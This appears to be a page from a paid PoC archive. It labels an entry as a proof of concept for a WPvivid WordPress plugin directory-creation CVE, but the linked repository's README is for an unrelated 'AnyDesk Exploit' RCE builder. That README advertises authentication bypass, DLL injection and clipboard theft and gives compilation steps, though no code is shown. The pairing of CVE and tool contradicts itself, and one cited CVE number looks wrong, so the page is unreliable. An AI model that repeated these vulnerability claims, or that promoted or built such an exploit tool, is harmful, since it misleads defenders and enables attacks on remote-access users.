Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-12654 PoC — Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.120 - Authenticated (Admin+) Arbitrary Directory Creation

Source
https://github.com/Tarimaow/Anydesk-Exploit-CVE-2025-12654-RCE-Builder
Associated Vulnerability
Title:Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.120 - Authenticated (Admin+) Arbitrary Directory Creation (CVE-2025-12654)
Description:The Migration, Backup, Staging – WPvivid Backup & Migration plugin for WordPress is vulnerable to arbitrary directory creation in all versions up to, and including, 0.9.120. This is due to the check_filesystem_permissions() function not properly restricting the directories that can be created, or in what location. This makes it possible for authenticated attackers, with Administrator-level access and above, to create arbitrary directories.
Description
Exploit development targets vulnerabilities using tools like exploitation frameworks. CVE databases list risks, while CVE-2025-44228 is an example of a flaw. AnyDesk exploits highlight security gaps.
Readme
<p align="center">
  <a href="http://www.theunwindai.com">
    <img src="https://github.com/user-attachments/assets/fe95e86b-926a-45e1-bb58-741b34bf76a0" width="900" height="400" alt="Unwind AI">
  </a>
</p>

<div align="center">

<a href="z"><img src="https://img.shields.io/badge/VB.NET-512BD4?style=for-the-badge&logo=dotnet&logoColor=white"/></a>
<a href="z"><img src="https://img.shields.io/badge/Visual_Studio-5C2D91?style=for-the-badge&logo=visual%20studio&logoColor=white"/></a>
<a href="z"><img src="https://img.shields.io/badge/VSCode-0078D4?style=for-the-badge&logo=visual%20studio%20code&logoColor=white"/></a>
</div>


# AnyDesk Exploit

AnyDesk, remote access software, has faced security concerns like RCE (Remote Code Execution), allowing attackers to execute malicious code on target systems. CVE-2020-13160 highlights a DLL hijacking flaw in versions prior to 5.5.2, enabling unauthorized system access. Authentication bypass risks let attackers skip login requirements, while DLL injection allows malicious libraries to run. Insecure permission management may grant excessive user privileges. Clipboard data leakage exposes sensitive copied content, and network scanning vulnerabilities reveal system info.

## Features

* 1. RCE (Remote Code Execution)
* 2. CVE-2020-13160
* 3. Authentication Bypass
* 4. DLL Injection
* 5. Insecure Permission Management
* 6. CVE-2019-14743
* 7. Unauthorized Audio Chat Access
* 8. Clipboard Data Leakage
* 9. Network Scanning Vulnerability
* 10. Version Check Bypass

### Requirements  
- Visual Studio 2022
- .NET Framework must be installed.  
![133](https://github.com/fikfifkasd/asd2342/assets/80986477/df0c0345-8a39-4bab-83ce-9211c8324283)

### Compilation
- Download the project to your computer
- Extract the project to a Folder.
- Open Solution File
- Select **Build Solution** from the **Build** menu.
  - ![vsgif](https://github.com/fikfifkasd/asd2342/assets/80986477/e6351858-7564-4d41-adce-56b8ad70898c)

- Find Executable File
```
./bin/Debug/
```

## Preview
![photo_2025-04-02_20-19-43](https://github.com/user-attachments/assets/fc7ae72d-9e99-4155-b170-9e2a30ec1ba4)


https://github.com/user-attachments/assets/a50bb11e-bd9c-44c3-a459-4ddd0a6a9932

## Contributing

**⭐ Star this repository if you find it useful!**

## Disclaimer

**This content is provided for learning and testing purposes only. The information presented is for general information purposes and does not address any specific situation.**


## Licence

Project is licenced under the [MIT licence](https://github.com/AvaloniaUI/Avalonia/blob/master/licence.md).
File Snapshot

 [4.0K]  /data/pocs/a21765d3effbcb1cc0c2475a73744b781ae3c5f6
├── [  25]  AnyDesk
├── [4.0K]  AnyDesk Exploit
│   ├── [ 46K]  AnyDesk Exploit.vbproj
│   ├── [ 479]  AnyDesk Exploit.vbproj.user
│   ├── [5.1K]  App.config
│   ├── [3.7K]  Form1.Designer.vb
│   ├── [5.7K]  Form1.resx
│   ├── [4.1K]  Form1.vb
│   └── [4.0K]  My Project
│       ├── [1.5K]  Application.Designer.vb
│       ├── [ 510]  Application.myapp
│       ├── [1.1K]  AssemblyInfo.vb
│       ├── [2.7K]  Resources.Designer.vb
│       ├── [5.5K]  Resources.resx
│       ├── [ 18K]  Settings.Designer.vb
│       └── [4.6K]  Settings.settings
├── [1.1K]  AnyDesk Exploit.sln
├── [1.2K]  LICENSE
├── [2.5K]  README.md
└── [ 739]  SECURITY.md

2 directories, 18 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →